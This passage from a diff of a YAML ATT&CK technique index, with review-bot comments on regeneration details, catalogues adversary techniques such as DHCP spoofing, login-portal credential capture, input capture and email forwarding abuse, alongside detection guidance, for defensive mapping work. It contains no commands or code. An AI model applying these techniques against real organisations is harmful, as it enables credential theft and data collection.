+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
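Review bot: the new T1557.004 (Evil Twin) entry ships with `x_mitre_detection: ''` and `atomic_tests: []`, so it adds a technique with neither detection guidance nor a test, which is acceptable for an index entry but worth stating. It is also emitted without the `identifier: T1557.004` line that T1025, T1074.001 and T1119 carry before `atomic_tests`, following the T1074.002 / T1213.001 variant instead, so the pre-existing inconsistency in whether `identifier` is present is extended to the new object; the generator should pick one form. Separately, the description carries the upstream wording `the adversary may able to monitor` (missing `be`); since this is source text it should not be patched locally, but it is worth reporting upstream.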
@@ -40683,7 +41244,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -40713,8 +41274,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -40768,7 +41327,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40805,7 +41363,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40833,12 +41391,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40875,23 +41431,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -40924,21 +41480,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -41046,12 +41601,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -41062,13 +41616,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41082,6 +41636,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -41092,12 +41647,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -41142,30 +41697,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -41175,31 +41711,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
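Review bot: the T1213.001 block is a full regeneration rather than a hand edit: `x_mitre_permissions_required: - User` and `spec_version: '2.1'` are dropped, `x_mitre_domains`, `x_mitre_platforms` and `revoked` are introduced, `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0, and `external_references` moves below `x_mitre_data_sources`. Please state in the PR description which generator and which upstream ATT&CK dataset release produced this, so reviewers can diff the source object instead of auditing key reordering line by line; also confirm the description change (the added `(i.e., [Unsecured Credentials](...T1552))` cross-link) matches the upstream text verbatim, since that is the one content change buried in the reorder.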
@@ -41232,10 +41785,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
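Review bot: the `+ x_mitre_attack_spec_version: 3.2.0` inserted near the top of the T1114.003 object only works because the later hunk `@@ -41285,70 +41841,66 @@` removes the older `x_mitre_attack_spec_version: 3.1.0` and `x_mitre_modified_by_ref` from the bottom of the same object. Applied on its own this hunk leaves a duplicate mapping key, which strict YAML loaders reject, so the regeneration must land as one commit and should not be cherry-picked per hunk. The new contributor `Arun Seelagan, CISA` looks like an upstream addition and needs no action.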
@@ -41244,16 +41799,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
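Review bot: `Office 365` and `Google Workspace` are removed from `x_mitre_platforms` and replaced by the single value `Office Suite` (with the version bump 1.3 to 1.4). Any per-platform index, filter or test-selection logic keyed on the old platform strings will silently stop matching this technique, so check that the platform-specific indexes were regenerated in the same change and that `Office Suite` and the new data source `Cloud Service: Cloud Service Metadata` are accepted values wherever this file is validated.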
@@ -41285,70 +41841,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
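Review bot: in the T1074 block the only substantive changes are the `modified` timestamp and the Mandiant M-Trends 2020 reference URL, which moves from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`; everything else is key reordering (for example `x_mitre_platforms` moving from the top of the object to below `x_mitre_is_subtechnique`, and `x_mitre_version: '1.4'` being deleted and re-added unchanged). Call the URL change out in the PR description, and consider having the generator emit keys in a stable order so future upstream syncs produce diffs that show only real changes.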
@@ -41421,7 +41973,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
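Review bot: `spec_version: '2.1'` is removed from T1056.002 here (and from every other object in this file) while `x_mitre_attack_spec_version: 3.2.0` is kept. `spec_version` is a required common property on STIX 2.1 domain objects, so any consumer that loads these `technique` mappings as STIX will now have to supply it itself. If these objects are only read by the atomic index tooling that is acceptable, but the removal should be stated as intentional rather than left as a side effect of the regeneration.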
@@ -41476,12 +42027,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41493,6 +42043,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -41500,11 +42053,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41521,14 +42074,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -41544,6 +42094,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41552,13 +42103,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -41566,15 +42117,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
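Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`, `root`, `User`) is dropped from T1056, yet the same field is retained for T1602.001 further down in this file (`x_mitre_permissions_required: - Administrator` stays as unchanged context). Either the generator preserves the field only where the source object still carries it, or the objects were produced from dataset releases of different ages; please confirm which, because anything filtering tests by required privilege level will now see the field on some techniques and not others.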
@@ -41585,9 +42132,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
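Review bot: the new T1213.004 object ships with `x_mitre_detection: ''` (an empty string) while listing two data sources. If the index renderer prints the detection field, an empty string produces a blank section, so either omit the key when it is empty or have the renderer fall back to `x_mitre_data_sources`. Also verify that the typographic apostrophe in `organization’s` in the description survives the CSV and Markdown index generation without mangling, since the other descriptions in this file use plain ASCII quotes.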
@@ -41633,7 +42231,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
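Review bot: the `modified` timestamp for T1557.002 goes backwards, from `2022-11-08T14:00:00.188Z` to `2022-07-22T18:37:22.176Z`. A regeneration should not rewind an object's modification time unless the previous value was wrong, so confirm that the source dataset used here is newer than the one that produced the current file and not an older snapshot; this object also keeps `x_mitre_attack_spec_version: 2.1.0` in the next hunk while its neighbours move to 3.2.0, which points the same way.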
@@ -41652,37 +42250,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
